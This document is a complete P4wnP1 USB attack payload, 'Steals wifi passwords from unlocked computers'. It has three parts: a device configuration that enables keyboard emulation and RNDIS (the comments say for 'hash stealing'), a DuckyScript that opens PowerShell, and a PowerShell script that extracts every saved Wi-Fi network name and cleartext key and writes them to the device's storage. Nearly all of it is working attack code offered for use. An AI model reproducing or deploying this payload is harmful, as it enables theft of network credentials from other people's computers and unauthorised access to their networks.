P4wnP1 - Steals wifi passwords from unlocked computers

payload.txt

#P4wnP1
# ==========================
#
# Steals wifi passwords from unlocked computers
# freely inspired by https://github.com/mame82/P4wnP1/tree/master/payloads/hakin9_tutorial

UMSLABEL="WIFI"
fatlabel $wdir/USB_STORAGE/image.bin $UMSLABEL

# =============================
# USB setup
# =============================
USB_VID="0x1d6b"    # Vendor ID
USB_PID="0x1002"    # Product ID
USE_ECM=false       # we need no Linux/Mac networking
USE_RNDIS=true      # RNDIS network device to enable hash stealing
USE_HID=true        # HID keyboard to allow entering cracked password
USE_UMS=true # enable USB Mass Storage

lang="sv" # MAKE THE KEYBOARD LANGUAGE MATCH THE TARGET

function onKeyboardUp()
{
        # execute DuckyScript responsible for bringing up PowerShell
        cat $wdir/payloads/wifi_passwd/startps.duck | duckhid


        cat $wdir/payloads/wifi_passwd/stealwifi.ps1 | outhid
}

startps.duck

GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 1000

stealwifi.ps1

$drivefound=$false
while (-not $drivefound)
{
    try
    {
        $drive=Get-Volume -FileSystemLabel "WIFI" -ErrorAction Stop
    }
    catch
    {
        "Waiting for P4wnP1 drive"
        sleep 1
        continue
    }
    $dl=($drive.DriveLetter | Out-String)[0] +":"
    $drivefound=$true
}

# put ya payload below

$filename=$dl+"\"+$env:COMPUTERNAME+"_"+$env:USERNAME+".txt"
$WirelessSSIDs = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+"
$WifiInfo = foreach($SSID in $WirelessSSIDs) {
    $Password = (netsh wlan show profiles name=$SSID key=clear | Select-String 'Key Content') -replace ".*:\s+"
    New-Object -TypeName psobject -Property @{"SSID"=$SSID;"Password"=$Password}
}
$WifiInfo | Out-File $filename
exit